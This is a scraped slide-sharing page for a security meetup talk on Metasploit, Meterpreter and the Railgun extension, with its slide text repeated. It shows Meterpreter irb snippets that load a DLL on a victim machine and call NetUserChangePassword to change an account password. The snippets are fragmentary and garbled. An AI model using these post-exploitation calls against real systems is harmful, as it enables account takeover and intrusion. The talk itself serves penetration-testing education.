際際滷

際際滷Share a Scribd company logo

Metasploit Railguns presentation @ tcs hyderabad

Download as PPTX, PDF
Chaitanya krishna
Chaitanya krishna

This document discusses introducing Metasploit Framework and enhancing Meterpreter using Railguns. It provides an overview of key concepts like vulnerabilities, exploits, payloads, and Metasploit. It describes how Meterpreter works and its benefits. It then explains how Railguns allow calling arbitrary DLL functions to extend Meterpreter's capabilities. The document demonstrates adding Railgun functions and DLLs dynamically during a session to call new APIs.

1 of 21
A.Chaitanya Krishna
Vivek Ramachandran (SecurityTube.net) Bharath (Kiva Cyber securities) My friends
Agenda Introduction to Metasploit Framework Keywords Introduction to Metasploit Meterpreter Enhancing Meterpreter using Railguns Adding Railguns Functions and Dlls on fly Demo
Buzz Words Vulnerability Weakness existed in a system which could be compromised. Exploit Code which works on the target vulnerability system. Payload Actual Code that lets an attacker to gain access after exploitation
Metasploit Framework Widely used Tool for Development and Testing Vulnerabilities Buzzing word security community Used for Penetration Testing IDS signature development Exploit Development
Why we need to opt Metasploit Widely accepted tool for the Testing vulnerabilities Makes complex tasks more ease Posses rich set of modules organized in systematic manner Has Regular updates Contains different types 1000 + exploits , 200 + Payloads, 500+ Auxiliary Modules
Meterpreter Meterpreter > Its a default Goto Payload for Windows Provides Enhanced Command Shell for the attacker Consists of default set of core commands Can be extended at runtime by shipping DLLs on the Victim machine Provides basic post-exploitation API
Working of Meterpreter Getting a meterpreter shell undergoes 3 different stages sends exploit + Stage 1 Payload sends DLL injection payload meterpreter DLL starts communication
Sample Scenario Sends Combination of Payload and Exploit Backtrack Windows XP 192.168.47.129 192.168.47.128
Metasploit Railguns presentation @ tcs hyderabad
Why Railguns Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> Meterpreter extension that allows an attacker to run any DLLs Allows arbitrary loading of DLLs Windows API DLLs are known paths. So we can load them very easily Railgun gives us flexibility and power to call arbitrary functions in DLL's on victims machine
Hello World DLLs As windows operating system is known for its rich set of DLLs Contains shipped in DLLs along with windows as well as from installed applications Can be called on the fly using the irb mode or can be statically define them /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/def
Introduction to DLLs and Functions Not all functions are defined to call. Need to add our own DLLs to call them during the runtime. Appropriate Function to be called for particular DLL Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> Client.railgun.user32.MessageBoxA(0, Hello Null Hyderabad, Welcome to the meet, NullCon , MB_OK)
Anatomy of Functions Function Name Function Return Type In Parameters are the arguments through which we pass input to the function Out Parameters are full-fledged data pointers and complete memory allocation is entirely managed by Railgun Out Parameters Array of Parameters
Metasploit Railguns presentation @ tcs hyderabad
Necessity of DLLs and Functions In the middle of our penetration testing we need to call additional API for support to our work. Can be called during fly or else we need to define them statically /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/def
Metasploit Railguns presentation @ tcs hyderabad
Adding Functions on fly Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> ?> client.railgun.known_dll_names => ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi"] unless client.railgun.known_dll_names.include? NullCon print_status "Adding NullCon.dll" client.railgun.add_dll(NullCon','C:WINDOWSsystem32NullCon.dll') else print_status NullCon DLL has already loaded.. skipping" end
Metasploit Railguns presentation @ tcs hyderabad
Adding Functions on fly Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> client.railgun.add_funcution('netapi32', 'NetuserChangePassword', 'DWORD',[ ["pwchar", "domainname", "in"], ["pwchar", "username", "in"], ["pwchar", "oldpassword", "in"], ["pwchar", "newpassword", "in"]) = = > => #<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::DLLFunction:0x00000006d4fa70 @return_ me", "in"], ["PWCHAR", "oldpassword", "in"], ["PWCHAR", "newpassword", "in"]], @windows_name="N >> client.railgun.netapi32.NetUserChangePassword(nil, NullCon, NullCon, NullCon123)
Thats all Client.railgun.user32.MessageBoxA(0, Thats what in my slides to show, NullCon , MB_OK) Chaitanyapentest@gmail.com

More Related Content

Metasploit Railguns presentation @ tcs hyderabad

  • 2. Vivek Ramachandran (SecurityTube.net) Bharath (Kiva Cyber securities) My friends
  • 3. Agenda Introduction to Metasploit Framework Keywords Introduction to Metasploit Meterpreter Enhancing Meterpreter using Railguns Adding Railguns Functions and Dlls on fly Demo
  • 4. Buzz Words Vulnerability Weakness existed in a system which could be compromised. Exploit Code which works on the target vulnerability system. Payload Actual Code that lets an attacker to gain access after exploitation
  • 5. Metasploit Framework Widely used Tool for Development and Testing Vulnerabilities Buzzing word security community Used for Penetration Testing IDS signature development Exploit Development
  • 6. Why we need to opt Metasploit Widely accepted tool for the Testing vulnerabilities Makes complex tasks more ease Posses rich set of modules organized in systematic manner Has Regular updates Contains different types 1000 + exploits , 200 + Payloads, 500+ Auxiliary Modules
  • 7. Meterpreter Meterpreter > Its a default Goto Payload for Windows Provides Enhanced Command Shell for the attacker Consists of default set of core commands Can be extended at runtime by shipping DLLs on the Victim machine Provides basic post-exploitation API
  • 8. Working of Meterpreter Getting a meterpreter shell undergoes 3 different stages sends exploit + Stage 1 Payload sends DLL injection payload meterpreter DLL starts communication
  • 9. Sample Scenario Sends Combination of Payload and Exploit Backtrack Windows XP 192.168.47.129 192.168.47.128
  • 11. Why Railguns Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> Meterpreter extension that allows an attacker to run any DLLs Allows arbitrary loading of DLLs Windows API DLLs are known paths. So we can load them very easily Railgun gives us flexibility and power to call arbitrary functions in DLL's on victims machine
  • 12. Hello World DLLs As windows operating system is known for its rich set of DLLs Contains shipped in DLLs along with windows as well as from installed applications Can be called on the fly using the irb mode or can be statically define them /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/def
  • 13. Introduction to DLLs and Functions Not all functions are defined to call. Need to add our own DLLs to call them during the runtime. Appropriate Function to be called for particular DLL Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> Client.railgun.user32.MessageBoxA(0, Hello Null Hyderabad, Welcome to the meet, NullCon , MB_OK)
  • 14. Anatomy of Functions Function Name Function Return Type In Parameters are the arguments through which we pass input to the function Out Parameters are full-fledged data pointers and complete memory allocation is entirely managed by Railgun Out Parameters Array of Parameters
  • 16. Necessity of DLLs and Functions In the middle of our penetration testing we need to call additional API for support to our work. Can be called during fly or else we need to define them statically /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/def
  • 18. Adding Functions on fly Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> ?> client.railgun.known_dll_names => ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi"] unless client.railgun.known_dll_names.include? NullCon print_status "Adding NullCon.dll" client.railgun.add_dll(NullCon','C:WINDOWSsystem32NullCon.dll') else print_status NullCon DLL has already loaded.. skipping" end
  • 20. Adding Functions on fly Meterpreter > irb [*] Starting IRB shell [*] The Client variable holds meterpreter client >> client.railgun.add_funcution('netapi32', 'NetuserChangePassword', 'DWORD',[ ["pwchar", "domainname", "in"], ["pwchar", "username", "in"], ["pwchar", "oldpassword", "in"], ["pwchar", "newpassword", "in"]) = = > => #<Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::DLLFunction:0x00000006d4fa70 @return_ me", "in"], ["PWCHAR", "oldpassword", "in"], ["PWCHAR", "newpassword", "in"]], @windows_name="N >> client.railgun.netapi32.NetUserChangePassword(nil, NullCon, NullCon, NullCon123)
  • 21. Thats all Client.railgun.user32.MessageBoxA(0, Thats what in my slides to show, NullCon , MB_OK) Chaitanyapentest@gmail.com